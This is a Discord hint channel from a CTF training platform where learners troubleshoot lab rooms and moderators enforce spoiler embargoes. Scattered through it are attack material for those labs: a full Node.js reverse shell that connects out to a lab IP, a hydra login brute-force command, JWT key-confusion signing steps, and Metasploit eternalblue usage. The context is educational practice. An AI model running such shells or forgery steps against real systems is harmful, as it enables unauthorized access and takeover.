#room-hints
nice @ashen marsh 
Accepted your writeup, had some surprise free time today to look thru and it was great 😄
Great! thank you
again great box keep them coming !
Cheers!!
okay so im doing the wreath room now i try to cat the id_rsa but its blank for some reason am i missing something
Hi all, I'm at "Brainstorm", and I'm crashing the server to determine the offset, BUT I need to reboot the machine every time I crash it. Am I correct in bulldozing it? Or is there a better, "fancier", cleaner way to do it?
Run the binary in your own machine where you can inspect the registers?
Is that an option? The binary is Windows and I'm investigating on Kali, but I'll try to disassemble it, maybe I'm taking for granted that I can't do that
Yes. It's an option. Make a windows VM with the appropriate version and architecture.
Time to dust off my Flare VM right
anybody got any ideas?
can you open the image normally?
Ill see one sec
In my experience, that can mean steghide wants a password
how much of a hint do you want?
yep opens fine, and hmm maybe yeah, it prob does need a password
Can you tell me if it needs one or not?
I figure its password protected anyway
yup, I believe if you get the right password it will open successfully
sweet just gotta keep looking then
there is an alternate method of getting access to the machine which doesn't require stego, have you enumerated the machine fully?
probably not, i want to keep trying for a little bit before getting more hints or looking at the writeup
thanks man! 🙂
hey guys im stuck on the last question of remux the tmux,
How can you run the desired plugin after loading it?
😄
no spaces 😦
but if you add it to your tmux config, it'll be used every time
what's the actual question?
How can you run the desired plugin after loading it?
what do you mean "run"?
How would you load a plugin into a tmux config file?
set -g plugin
How can you run the desired plugin after loading it?
makes any sense ?
hi i'm doing "HA Joker CTF" room and i'm stuck at question 8
what should i do?
it says use burpsuite but why would i decode it to base64?
i tried brute-force the web page using hydra but it didn't work
Because it's http basic authentication. Hydra will work.
found it lol, it was run-shell
Hello, I'm looking for a hint in the Sysmon room, for the Task 10 question "What process was accessed by schtasks.exe that would be considered suspicious behavior in Investigation 3.2?" I can view the log and I see what happened, but I don't see anything that could fit in the format of the answer. I'm stumped!
Hi, please keep all conversation in English as per Rule 8
I wanted a tip on a question that I'm not able to ask
Yes, there are Brazilians here. A lot of them (us).
Hello, i need a hint in Crypt room task5, i tried to use hashid to find out the encryption of the hash. Found bcrypt, but i am not able to decrypt it with John the Ripper.
Can any one give me a direction?
There are a lot of rooms that could be Crypt room
What's the room title? What's the URL?
Yes, that first one is bcrypt
John the ripper will work.
Use Rockyou as your wordlist.
i don't know if i can post the command here, but i tried
-format=bcrypt --wordlist=<rockyou> <file hash>
and it does not work
is anybody here familiar with the ignite box and can give me a hint what to do after i exploited the box and got the user.txt, i dont want to look up the write ups, i want just a keyword to look for...
Hello there, I am currently on the nmap room and can't seem to figure out the "general purpose of using NULL, FIN and Xmas." I mean I'm pretty sure I understand that it's for stealthiness beyond syn, but I can't quite figure out the answer they are looking for. Any hints would be greatly appreciated.
I'm in that room right now, just further down, lol. There are three states of packets, open, closed, and the other one. You want to get around the other one
heh, I focused too much on the word general, looked at the beginning, and didn't look at the end of the explanation closely enough. Thanks muchly!
can anyone help me with this `What form of authentication is password-based authentication?`
"If you're having problems authenticating, check that you're escaping the '$'."
im trying to authenticate a user that ive added into the /etc/passwd
whenever i type in the password, it gives me a # then expects an input
oh i got it, it had to be /bin/bash
In the room password security ...
Any hint for Crypto ____ with age?
It's underneath the scrypt
oh got it
thanks
Hi. Did you get this to work? I'm having the same issue
yes, if you look below (after the message I wrote there) you will be able to see how I approached that. If you still have problems with that, let me know 😉
Thanks for replying. Yes, I did follow the thread. Which port did you end up using for the webserver and where exactly did you change the ports in the exploit?
Here's what mine looks like now
well, I am not sure you modified the right thing in there. I am not sure that you added the port correctly.
so, first of all try to understand what that vbs variable is. I mean, use an URL decoder and see where you should add the port you want
for now, as it was mentioned when I asked, is going on the default http port, 80
try to decode it and add the port you want to listen to 😉 and you'll see where you will have to modify
also, if you still have problems with adding the port, look closer at my pictures (especially this one, where I have added the port) because you have my whole setup
Okay. I will try that. Thanks @jovial sentinel
no problem, mate. If you still have questions, drop them here 😉 I'm glad to help you
BadByte 0.5 im in and i cannot find a way to privesc anyone have any clues?
Do not provide or ask for help or hints for the VulnNet: Node room until 29th March, 7pm (GMT)
hello, can someone explain to me how to solve question 3 of task 5 here? https://tryhackme.com/room/passwordsecurity im trying to understand it but i just cant and i already tried the hint to google and cant find anything :S, i want to understand how to make the math right but just cant, tested all the possible solutions i found but all are wrong, feels like a dumb hehe
when you get the possible answer remember to round up to a whole number
yea, i did it but i think im doing something wrong there
the a-z+a-z is your first number, then you need to raise it to your number of characters and multiply by 8 bytes, after that I used Google to convert to correct answer
Hi All, Noob here - Im doing OWASP-Juice-Shop Task 4 and running brute-force atk via burp. I'm using THM attackbox and its running for 30 mins w 323/5200. is this normal and how long will this take to finish? or my box is slow?
Hi all, any hints for iso27001 task 2.4
If you get the ISO 27001 cert for internal auditor, which types of audits are you able to do?
there are 3 possible answers, although only one of them actually states it directly
Thanks, was trying a few different from research.
the community version of burp is rate limit throttled, so it goes incredibly slow (at least in my experience)
you could try using hydra to bruteforce it perhaps?
Hi, new user here having some trouble with activity 14 in https://tryhackme.com/room/furthernmap: i keep getting no-response on all of the ports, not getting any open ones for the 5000 port section.
The nmap command i'm using is sudo nmap -Pn -f -sS -p1-5000 -vv [machine_ip] -oN ./Desktop/nmap.txt
btw that command takes me about 15 minutes to even run, no joke
You could use the -T4 flag to speed up the ping scanning
hello, someone had this error b4 while trying to use spiderfoot?
Invalid target type. Could not recognize it as a target SpiderFoot supports
i followed the guide on the room https://tryhackme.com/room/somesint step by step and still cant search a simple name or nickname for the room
nvm fixed it just by using quotes to type it XDDDD i think i should sleep more and do less ctf's haha
Binary-related question: While debugging a program, the addresses are local, or are fixed across machines?
What I mean is, if a given function starts at 0xDEADBEEF, will it be the same if I run the same binary in another computer?
Put " before and after name or nickname.
any hint for boiler ctf? im still in the enumeration, apparently i need to find a file... checked the directories gobuster found, tried a dir traversal exploit for the cms and couldnt find it, what am i missing?
I'm not 100% sure, but I think it depends on how the program was written/developed.
nvm i figured it out
I didn't compile it haha so I guess it'll be trial and error
Has anyone solved easypeasy ctf room from tryhackme? I am stuck and need a nudge on how to enumerate for flag 2.
I have used more than 4 wordlists but still no clue
https://tryhackme.com/room/vulnversity im on task 2 and trying to figure out what the -n arg doesnt resolve. theres obviously a difference between nmap using the -O and -n args but i cant figure out what it wants as an answer
hey, have you found a fix? I'm also there getting the same thing
nvm, just figured it out
👍 thanks
Please be aware that VulnNet: Node is under an embargo
#room-hints message
Do not post spoilers on rooms on an embargo
My bad 
Sorry
I'm solving all in one room. Found a valid user for wp login. Trying bruteforcing the password with wpscan but it's been over 45 no success yet. Does it really require bruteforcing?
guys in the jack room the Privilege escalation is it ||Python library hijacking||
Yep, I believe it is IIRC
cool guess am doing the right thing
ok I might need some help on the linux fundamentals part 3 task 7 like I do not know what to start with
The question is:
We've been through a lot in this section, and the challenge for this binary will reflect that. The first step is actually finding the binary, I'm not heartless though, so I'll give you the name of the binary. The name of the binary is shiba4.
The actual binary will check for two things, it will be checking that there's a directory called test in your home directory, how you create that is up to you. It will also be checking that inside the directory there's a file called test1234.
and "open shiba4" doesn’t work
> and "open shiba4" doesn’t work
why would it work?
> The first step is actually finding the binary
The room tells you the first step. Perhaps find might be useful?
ohh yea there is a whole task on find
I try this but it does not work: find /shiab4 but it still says no such file or directory
That is not how you use find, so yeah that won't work
You're currently trying to look in /shiba4 for all files
ok how can you make spoiler text again?
like so if I got it right to not spoil it to everyone
nvm
||I typed: "find /tmp shiba4" but lots of things popped up and it says access denied and no such dir or file||
That's also not quite right.
You're now listing files in /tmp AND in shiba4 within the current directory
I recommend going back to the find section and re-reading how to find files with a specific name, because that very much isn't how to do that
because I read the section on "find" like two times but there are only 3 commands that it shows:
- find /
- find dir -user
- find dir -group
but it is not a user neither a group that I am searching for
Ok so maybe you need to keep looking. The internet is great.
PuTTY is a client for a bunch of different protocols. PuTTY can talk SSH, which you're using here. SSH isn't just for Linux.
ok I get it
ok so I need to find a binary in a file called "shiba4"
grep doesn't work either
it said that on stackoverflow
You need to find a binary called shiba4. A binary is a type of file.
so I need the file command and the find command
so do I need one of those commands
in find
a site tells me to do all of this:
$ file /bin/ls. ...
$ ldd /bin/ls. ...
$ ltrace ls. ...
$ hexdump -C /bin/ls | head. ...
$ readelf -h /bin/ls. ...
$ objdump -d /bin/ls | head. ...
$ strace -f /bin/ls. ...
$ cat hello.c.
but no find
im doing linuxstrengthtraining , i've found a chat log saying there is a backup file created hours ago from the chat log time which is 16:05
how can i find only files before 16:05
find / -type f -newermt '2020-08-13 16:05' 2> /dev/null
is what i've used but no luck i get a ton of files that i dont wanna loop through
and the date of that file created is 2020-08-13
-ban @white salmon Server invite pyramid scheme scam
🔨 Banned Bunnybunny_0922#8103 indefinitely
hey has anyone done pylon yet
that room got taken down
its still up im on it right now
shouldnt be
im stuck on wreath question 38 can i pm someone ?
Hi, stuck with Attacktive Directory room. Can't connect with smb client:
to map remote SMB shares worked...
directory: OK
smb password: OK
smb username: OK
ip pingable
solved
Hi guys..
M doing mindgames room.. able to decode the code but need some hints for next steps..
So, can you work out how it works?
If you can decode it, I think you should quite quickly be able to turn that into being able to run your own code
Yeah... I got that decoder type... But when I try to run shell command not accepting
Able to do print like simple commands not other commands
There's no restrictions on it
No filters or anything
Just some encoders are poorly implemented and don't work right.
```
Program Output:
File "<string>", line 1
import os os.system("ls")
^
SyntaxError: invalid syntax
```
getting above kind of error when trying to execute system related commands
Just some encoders are poorly implemented and don't work right.
Like that 100% looks like an encoder breaking
in the owasp juice shop room when brute forcing the admin accounts password about how quickly should you get the correct password because its been trying for almost 2 hours and i haven't gotten the correct one yet so im assuming i did something wrong?
yeah... same... dcode.fr didn't work... second one worked... thanks... 🙂
Hi, can i get a nudge on VulnNet2 Node Training's room, got the shell, but i'm stuck on lateral privilege(i know what i can do but didn't work)
nvm i figured it out
Do not provide or ask for help or hints for the SafeZone room until 31st March, 7pm (GMT)
nobody to give me a nudge on vulnNet2 ?
I think that one is still under embargo
Hi folks, I'm working the Network Services 2 Exploiting NFS section and am having an issue. I exploited the server to ssh into it. I download the bash executable, and permission it accordingly, but when I run it, a fault occurs:
./bash: line 7: syntax error near unexpected token `newline'
./bash: line 7: `<!DOCTYPE html>'
So the question is: is this a fault in the room or do I get another bash executable?
!docs verify
"<!DOCTYPE html>"...
You downloaded the webpage, rather than the binary
@white salmon @stuck fractal Oh geez. Yea, I 'wget' the file. That was dumb. Thanks I'll work on just getting the raw data.
@white salmon @stuck fractal Thanks folks. That was it. I appreciate the help.
Anyone complete the Web Fundamentals mini CTF? I am stuck on the second question for the POST flag. I am getting the following error: "You need the right request body"
My Curl command is: curl -d "data=flag_please" http://10.10.109.48:8081/ctf/post
data= is that the correct name?
The task instructions are: "POST request. Make a POST request with the body "flag_please" to /ctf/post"
I also tried body=
Why are you specifying anything=
You're not told a variable name, because it's not asking for one
It's asking for the body
Not a parameter = flag_please
The setup talks about using --data with POST
Yeah.
It doesn't tell you to set a parameter.
I made the room, I know precisely what the backend is looking for here.
Can you help me understand how you'd add the "flag_please" in the body of a post request?
why not try -d "flag_please"?
I thought I tried that, let me try it again
Thanks for your help! I'll have to look through my bash history. I thought I tried that. There must have been a typo on my part some place!
so im doing the hydra room (ik havent done it yet wow) but im wondering why ||"hydra -l molly -P rockyou.txt 10.10.252.223 http-post-form “/:login:username=^USER^&password=^PASS^:incorrect” -V" ||
isnt working
That format is totally broken
Should be three parts, separated with :
You have 4
ok thx
btw im also getting "File for password not found: "rockyou.txt" "
and im in the kali vm
Ok. Because you need to supply a path to it
It's not in your current directory, so you need to specify a path for it
wow im an idiot sorry ok thx
same issue
its not working!
Rule 13: When asking for help/tech support please perform research to your fullest ability and don't spam the chat if you don't get an answer to your question immediately. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
my bad, apologies
I'm solving jack-of-all room from tryhack. I got the initial foothold and also found a password list which is encrypted. But I can't crack it.
You sure you need to crack anything?
Tried using those as passwords in a brute force?
Anyone completed safezone1?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.
I am stuck in safezone1 room in enumerating stage I have tried nmap and gobuster there is a login page which have 3 attempts of login.
Oh and btw its a new room so no hints/help are provided till 31st March, 7pm (GMT).
Ok
hello, i am doing the /steelmountain room at task 2 question 3. the question is what is the CVE number for the exploit.
i have run nmap --script vuln. and i got 2x cve numbers out of that
but none of them work
does someone have a hint to where i should look next?
Hello, I am doing the section "ZTH: Obscure Web Vulns" but I got completely stuck with the challenge "Task14: Section 3 JWT: challenge". I follow everything that is explained in task11/12 but always getting "try again" on the website. I know there is an expiration time but I did it a lot of times already but still getting rejected. So I think I am doing something wrong here. these are the steps I take
- check if the JWT has algorithm HS256 by pasting it into https://jwt.io/ (if not, change it: i use https://www.base64decode.org/ to encode/decode , encoding with URL-safe encoding Base64URL format)
- get the public.pem from the website and convert it to hex
- use openssl to sign header and payload without signature : echo -n "<HS256 header>.<unchanged payload>" | openssl dgst -sha256 -mac HMAC -macopt hexkey:<hex public key from previous step>
- decode the hex signature in previous step to binary and re-encode it in base64: python -c "exec("import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('<signature previous step>')).replace('=','')")"
- use this result as the signature as follows (using jwt.io again by pasting the signature from previous step into "verify signature" field "your 256bit secret"): <HS256 header>.<unchanged payload>.<decoded signature previous step>
- site says: try again
thank you for the help, I dunno what I am doing wrong here.
pylon can get hint?
I did this room today, you need to be incredibly fast otherwise the JWT expires
it worked without cracking them
Yeah, because they weren't hashed
I thought maybe they were, my bad
That's why I hinted that they weren't.
Has anyone solved team? I am struggling with enumeration part. Did a lot of directory bruteforcing but no success. need a nudge
yeah next time onwards I will first try to use it if it happens in some other room
: an image that shows the contents of a computer display
How is that helpful..?
Technically a picture of a screen not captured by the computer is also a screenshot, regarding
> That is not a screenshot.
Anyways, nevermind I think
I think you knew what he meant...
Let's just abandon that topic, since it is already resolved. Sorry
Yes, indeed.
Please try not to cause problems in the help chats though -- doesn't really benefit anyone 🙂
Ok, so the things I do are correct ? It's just the speed? Any idea how fast you have to be?
There's some automated tools in that task, check them out
@inland onyx hi muir! doing wreath 🙂 .... can I dm you with a question?
Of course! Go for it 🙂
Hi I'm in room UploadVulns on Task 8, just looking for a push in the right direction
I think i'm looking in the right place? p sure this photo shows the accepted file types, and by trying they did work.
hi, can i get a nudge on pylon room?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
As another note, that room is currently private so I'm not sure how many people will be able to help you.
@stuck fractal ???
You asked for a nudge.
No one can provide you with a useful nudge if they don't know what part you need a nudge with
ah okay, sorry, i need a nudge on the pylon's flag 1...
What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
There's a reason the questions are there. They're bits of information that people neeeeeeed in order to give you a useful hint
I extracted the text from the image, but I'm stuck figuring out what exact encoding or a combination of encoding
Same
Hi! Has somebody had problems with the room "intro to x86-64"? In the last task it is necessary to put the respective password of 10 characters. I have the answer (I guess it is the correct one) and the program doesn't give the flag.. it only says "Password Correct"
So in the task I type the password again and it doesn't accept it
I found CyberChef to be helpful
Hum i used another tool
Hey, I'm on the network services room, I've done the SMB section of the exploit, trying to get the right username to ssh into the polosmb3 machine, and i'm drawing a blank
I got it... last name as username... doh
same
I'm having troubles to understand what is being asked in linux modules room at task 7 when it ask "what did she sed?"
P.D: I have got the answer but I don't know why it is the answer, I'm not native English speaker
im currently in that same room lol. how did you figure out to use the last name?
also i got the id_rsa file but not sure how to use it for ssh
If you look in id_rsa.pub, at the end, it gives you the user@host that the key was generated on
ah thanks, i did download the pub file but didnt occur to me to open it
That user@host doesn't always correspond to the user and hostname of the system you're using it on
Just the system it was generated on
anybody done pylon root? i dont think it is possible to get root even tried official path of root privesc but box get crashed everytime
its definitely possible, cant say for sure what is going wrong for you
```
listening on [any] 4141 ...
connect to [10.9.155.125] from (UNKNOWN) [10.10.241.111] 55422
root@pylon:/home/lone#
```
yes it is possible i get the call back but it immediately died and even tried official writeup technique after tired of everything but still nothing work
as soon as run the config, box crash
dm me.
Apologies to anyone who has / had trouble completing this room, i think i got a little ambitious, worked fine in testing 🤷‍♂️
i think u r right the problem is with resources coz of the free server, i haven't found any other problem, nm
more resources have been approved, not sure how long it will take before it comes into effect
not even sure if thats the problem, might be a routing issue
If a password hash starts with $6$, what format is it !
I'm searching it from yesterday
sha512 off the top of my head
Andy what I'm getting just! SHA512
sha512crypt
Wow thank you 😭😭😭
Room: Relevant
Hello. I am doing the Relevant room. I got in, I managed to get a reverse shell and got the user flag but I don't know what to do next. I tried winPEAS and got nothing. Ok, almost nothing, I got that CredentialGuard is not enabled. This is the only thing that got my attention. Any hints on what to do for some privesc?
take a look at the output of winPEAS again, especially the privileges the user has (whoami /priv) see if you can find anything odd there
Great. So winPEAS is not a dead end. I will do that. Thanks.
Do not just give answers for room questions.
is there any video available for vulnerability part?
has anyone done vulnnet node?
I've created the payload, encoded to base64, sent as cookie but still no reverse shell
This is the payload I'm encoding
||message: ||
any hint on safe zone?
That room is still under help and hints embargo, as per Rule 13.
hi guys, I need help for the room Simple CTF, can someone help me?
which question
the third one : What's the CVE you're using against the application?
I've been looking in exploit-db but ... nothing works
you are looking at the cms, correct
what do you mean by CMS ? the soft which use the protocol ?
I really need help on this one ... I don't know what I am doing wrong here
CMS is a webapp generally, something like Wordpress or Joomla is a CMS. A way of building and managing webapps
ok, i'm in the wrong way, thx
I was looking for something around the port which was the focus of the second question
I need more practice, thx guys
Do not provide or ask for help or hints for the Debug room until 2nd April, 7pm (GMT)
alright so after a whole evening of headaches, turns out that changing my VPN Server fixed it. Switched from EU-VIP 2 to EU-VIP 1 and that did the trick. In case that helps. Cheers
hey guys I'm in the owasp top 10 room but i got stock in this question from task 5. could someone help me? I don't know what to do
stuck*
i don't have my notes in front of me, but I think a gobuster scan might help with that
sure? the previous room talks about burp suite
no, not sure. I don't have my notes at the moment
oh thanks by the way
don't worry
you can use a tool called dirsearch from github
some built in tools dont take ip addresses
Hello guys I am stuck in this room --How websites work
into html injection
this one
i need help on back pen-testing
how can i use brute-forcing to find the username & password ?
You can't always enumerate usernames by bruteforcing tho
Has anyone done How websites work room in Complete Beginner????
I am stuck in the HTML injection question
Ok
did you search for creating an html link in google?
Well I had the same problem
But what might help is refreshing the page
Cuz If you made some changes already it might not work
I couldn’t understand it in stack overflow
<a> tags with attributes
<a href="url"></a>
yes
Just that?
Try refreshing and doing it like that
yup
yeah
Yes wait
just make sure that url is the actual url to hacker.com
you should add "http://" or "https://" before the "hacker.com"
Hope it works for you 🙂
It worked but the link says we cannot connect to hacker.com
Well, what did you write?
Like in the textbox
And what link?
You should only type <a href="//url to hacker.com"></a> and it should work 😄
You should only type in <a href="//url to hacker.com"></a>
It gives you a JS alert
and there is the answer
Is it fine now?
I wrote like this
bruh
write it in the textbox
wait a sec
I'll show you
contact me privately cuz i dont want to share it with others (it'd be too easy to cheat for them) 🙂
Ok
I wrote it slightly different but the result is the same
I enjoyed the new room.... haven’t used HTML in such a long time and it was fun to use it again 😊
Please ask your question directly.
People don't know if they can help unless they know the question.
Ok sorry
I don't know how to connect to the overwrite.uploadvulns.thm in Upload Vulnerabilities room...
Put that in the address bar of your browser.
As long as you added it to /etc/hosts correctly as the room tells you to, it will work
Urgh windows.
I hate win
Hacking from Windows isn't really a good idea unless you're already confident with hacking.
yesterday I had to reset my whole pc
Use the attack box or make a kali VM. Connect to the VPN from that kali VM.
I can deploy my kali vm
Use that.
I can use in-browser attackbox?
The room is pretty much entirely written for Linux users, like most rooms will be.
*for this room
That was one of the options I suggested, so yes.
So deploy attackbox and then type the linux command that was given in task 1?
still not working 😦
can anyone help with vulnet: node room, i got reverse shell but stuck on priv esc for user. i found what i most likely need to use but not sure how to leverage it.
why i'm not able to send ss in this groupe
@craggy ledge Did you check the 'usual' privesc ways? There should be an obvious way to escalate to user
Take care not to spoil too much when you get the answer
srry
Just say you're sorted @versed solstice
ight
Room: Steel Mountain
Task: 4
how do i debug this?? i search about it and found out that it was merged with urllib in python3 so i tried removing 2 at the end then, it printed out error in the exception case
are you sure it is a python3 script
no its python2
urllib2 is a python2 library, python3 has a different one iirc but you would have to adapt the script to python3 then
i tried with python 2 but still got the same error
you would need to install that library then using pip
your default for python is probably mapped to python3
put in python2 -m pip
python2 script.py
ahh i made a mistake
yup this worked
the normal python script.py doesnt mean python2?
oh so that's why my python 2 server isnt working. I just tried python2 -m SimpleHTTPServer 8000 and it worked
thank you @stuck fractal @glacial gust
Swap to python3 -m http.Server
Might be http.server
But the python3 version, you should swap to
yeah I started using python3 server after that error
Any hints on safezone?
Any nudge on glitch?
That's a brand new room, and as such falls under the 72 hour help and hints embargo as part of rule 13
Do not provide or ask for help or hints for the Glitch room until 3rd April, 7pm (GMT)
I am very sorry, I was not aware of this, where can I see the release date of a box?
#announcements for one
Any hint on safe zone?
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.
Upload vulnerabilities room, jewel challenge, ive done everything now all i have to is activate the reverse shell
but when i try running it in admin page it says module does not exist
no matter what i try
../content/FFS.jpg
./content/FFS.jpg
/content/FFFS.jpg
all of them dont work
There was a section that shiba3 wanted the password for, I couldn't find the basics in linux 2, can you help me.
someone throw me some hints for safezone please, struggling to get foothold
try something Windows like
@orchid root please remember rule 13, specifically the 72 hour embargo for help and hints on new rooms
Ook! I will remember this
need to verify with the bot
exploit/windows/smb/ms17_010_eternalblue
where?
dm the bot and it will tell you what to do
!docs verify
!docs verify
No need to repeat it @tired lantern
ok
I appear to have hit a brick wall and I hope someone can point me in the right direction. I'm also a complete beginner so please be gentle.
I am working on the "ccpentesting" room, I'm on Task 8 (Metasploit) and the current question is "What options sets the architecture to be exploited?"
I've loaded the eternalblue exploit as instructed. I've checked out the options and the advanced options, but I can't find anything about architecture. The closest thing I can find is the VERIFY_ARCH option which checks against my "Exploit target" but I can't figure out how to change this target and, even if I could, info suggests it's the only available target.
Is this because I've got msf6 and the room is designed for msf5?
it should work with either
I was able to guess the answer but I'd like to know how to see it in the options. And if I wanted to set it, it may not work.
It will work with either. For CC Pentesting you're not meant to use eternalblue?
Once you have found the module for the specific machine that you want to exploit, you need to select it and set the proper options. This task will take you through selecting and setting options for one of the most popular metasploit modules "eternalblue". All basic commands that could be run before selecting a module can also be done while a module is selected.
Yeah I'm on that final task now and using exploit/multi/http/nostromo_code_exec
I'm encountering another error where the exploit is deployed but no session is created. Googling suggests this is an issue with my msf
Currently updating.
I'm not getting any reply from bot
Probably an incorrect LHOST
Why it's not working?
Thanks. But I'm using my tun0 address.
This has been a blessing in disguise. I figured out how to enable verbose logging, saw a message that the RHOST on port 80 refused the connection and then used nmap to see that it wasn't listening on port 80. So I'm redeploying the machine... fingers crossed.
Is this a problem with the machine? The instructions state that the machine is vulnerable on port 80 but even this new deployment says port 80 is closed.
any hints on safezone?
I have tried
||XSS when creating a user
LFI using ?page=
guessing the password for admin
tried changing PHPSESSID||
Thanks @winged crag , got it.
any hints for tryhackme-->web fundamentals-->how websites work(room)-->HTML injection(Task 5)
Enumerate ||with bigger wordlists when looking for hidden directories||
Any hint on safezone privesc? || I am at the user files, need to go to user yash: i've tried privesc with mysql root credentials, looked at crontabs, and run linpeas and found nothing. Also the mysql database has nothing useful||
Just so i know, is there an actual directory? or did i miss a file maybe? I have already found ||note.txt|| Thanks either way
Yep there is a ||directory|| you haven't found yet
okay, ty ty!
i just realised it was something i hadn't tried, i'd tried combos, then eventually thought some people just go by surnames
hint on safezone room
after finding page get parameter in source code
tried all lfi methods
none are working idk why
You are probably not who you need to be. Earlier hint just above is relevant.
I'm stuck in Gotta Catch'em All! room. Need a nudge on enumeration part. Reviewing the page source told me to examine the console but got nothing except a few pokemon names. Thanks in advance
which wordlist are you talking about? big.txt?
I've used SecLists's raft large directories
At the end of Ice it suggests trying to use a manual exploit instead of metasploit. This appears to be a huge leap as I've opened the exploit-db page but have no idea what to do. I downloaded 568.c but what can I do with it?
nah there's no hidden directory
can you please name it?
in dm
Hi. Anyone working on the glitch room? Have reached a dead end
That room is still under help and hints embargo as part of rule 13.
Ah ok. Sorry my bad
hello can someone give me hints in room "glitch" i found "token='this_is_not_real'" so when i put it in the box cookie turned me on to the page "sad." . but the problem is i have not found anything in that page i can exploit
no one here ????
There is a hidden directory, just try one of the raft lists from seclists
See the pinned messages regarding the room glitch
@hexed crescent oooh thank you so much
hello, can anyone help me with the blue room: https://tryhackme.com/room/blue
Even following the video, the metasploit is unable to establish a connection, is always failing.
I re started the machine at least 5 times
show your options
I am not a pro but your LPORT LHOST is not right. It should be your tun0
Try this command and put in that ip
ip a | grep tun0
or
ip a s tun0
LHOST. LPORT is fine.
oops. Yeah, my bad 😄 Still, that command should help him 🤭
Could I get a tiny hint on jewel in uploadvulns? I don't want to google
it and get totally spoiled.
|| I've managed to upload my nodejs revshell and I know where it is. I've
found the /admin page and I know that should probably execute my
revshell from there with something along the lines of "activate
../content/XXX.jpg".
I also know the /var/www/html nodejs looks like
/var/www/html/node_modules/express/lib/rout..."" but I
can't figure out what I should do next.||
Maybe I should also add that this is the first time I'm dealing with
node ever. Any small pointer on how to proceed would be highly appreciated.
i give up for this room, no hints would help. The machine maybe has been updated and the vuln has been corrected.
||alright I got impatient and had a look at the linked hints.
it seems I was somewhat correct, I should run "../content/XXX.jpg" in the
admin page. but I still get no response with nc -lvnp 1234 and I get
the response "Module does not exist" on the webpage.
I'm using this revshell:
magic number here
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(1234, "10.9.5.199", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();||
Someone's said the magic number isn't needed because it's just clientside?
@inland onyx more and more people are giving up or complaining that it's broken
Magic number is not needed because that filter is client side
Adding a magic number there will break it
thank you!
@inland onyx I tried both magic and no magic and it failed
I did the uploadvulns room about a week or so ago, and everything was working. My biggest issue was that I'd put the file headers/magic numbers in the .js/.jpg reverse shell, which made it not executable as js code
I think that 'module not found' might be a generic error that also includes 'this isn't actually a valid module', but my memory is a little rusty on it
hey guys i am new to tryhackme
and i was doing this BOOKSTORE room i can't figure out how to do enum on this http site
i ve tried looking for version related exploits
and did directory busting but no luck
i even tried bruteforcing with default credentials but still couldn't break the ice
any hint would be highly appreciated pls help
so I did https://tryhackme.com/room/basicpentestingjt
i logged in as ||kay|| with ||the stolen id_rsa from jan|| and privesced to root
I used ||lxd privesc|| and set suid on /bin/bash with that to have it easier
/root/flag.txt said that there is a second way to privesc
I couldn't find it. there are a couple things for the kernel version i found in searchsploit, but none of the POCs there seemed promising. I tried a few anyway and they all faulted, failed or gave me "permission denied"
also i had trouble with the ||smb user enumeration|| with nmap. it just didn't give me any output while gobuster was running. maybe the connection was saturated? when I ran it later it worked just fine. was really annoying stumbling around forever
Do not provide or ask for help or hints for the USTOUN room until 5th April, 7pm (GMT)
nevermind... you can just ||sudo with kay using the password from the flag||...
and i do all that stuff xD well, good practice anyway
but i really should be paying more attention to the basics
Is anyone able to nudge me in the right direction for the room "Investigating Windows"?
I've got 2 answers to get but I am completely out of ideas.
hi guys
can i have a hint for looking glass room
i'm in as the user humptydumpty but idk how to escalate more than this
pls don't spoil the room just give me a small hint
Look at permissions, something is out of the ordinary. I can be a little more specific if you'd like.
||What permissions does humptydumpty have?||
||yup i went into alice and there's a .ssh directory but i got nothing ||
Take a guess at something you can read that would be helpful
You should get it in a couple of guesses
Nobody done investigating windows then?
||i read the authorized_keys file but i cant find the private key i also can't write to the authorized_keys||
||i cant find the private key betcha can||
hmmmm
@opal vine ||it's a standard name||
i tried || id_rsa || if that's what you mean
that didn't work? I'm pretty sure that's right
well maybe it isn't ||an rsa key, try ecliptic curve and the other ones||
i tried couple of them i'll search for more
i'm fairly sure it's that though... maybe i remember wrong.
make sure you're in the right directory. pwd
with the right user
or the wrong one as the case may be
it is
I made the room and I have the writeup up RN
oof sad amma terminate the machine
maybe there's something wrong
||drwx--x--x|| is weird... who would ever do that
yep
i spent more than an hour here
so arbitrary
James would 😛
though actually i had a drive failure and it fucked up some permissions on my directories and files
it allows you to enter the directory, but not list it
exactly. there is no reason to have such a weird permission
there might be edge cases where it could be useful
oooooooh now i know what happened
since i deployed the machine many time and i got into humpty dumpty from yesterday i knew it's something with alice's directory permissions so once i landed on the machine as jabberwock i went into alice and tried to cat out id_rsa which can't be done and then i switched to the user to humpty and assumed that id_rsa is not valid but if i was the user humpty dumpty it'll work
my bad guys
gj
That last bit, once you're Alice take a look at perms in the directory
If they were really poorly configured, that'd be the case. I didn't want people skipping parts of the box.
ah yup i figured that out but yup that was the right thing to do
even alice can't read her private key
ah right
Linux permissions are magic
id_rsa is owned by humpty
yup
it's a really nice room @stuck fractal
thanks for the effort you've put into this
also those are some weird usernames :P
have you read Alice in Wonderland?
i watched the movie
too spoopy
yup i might read them after this room
but that's getting off topic
the names aren't that strange 🙂
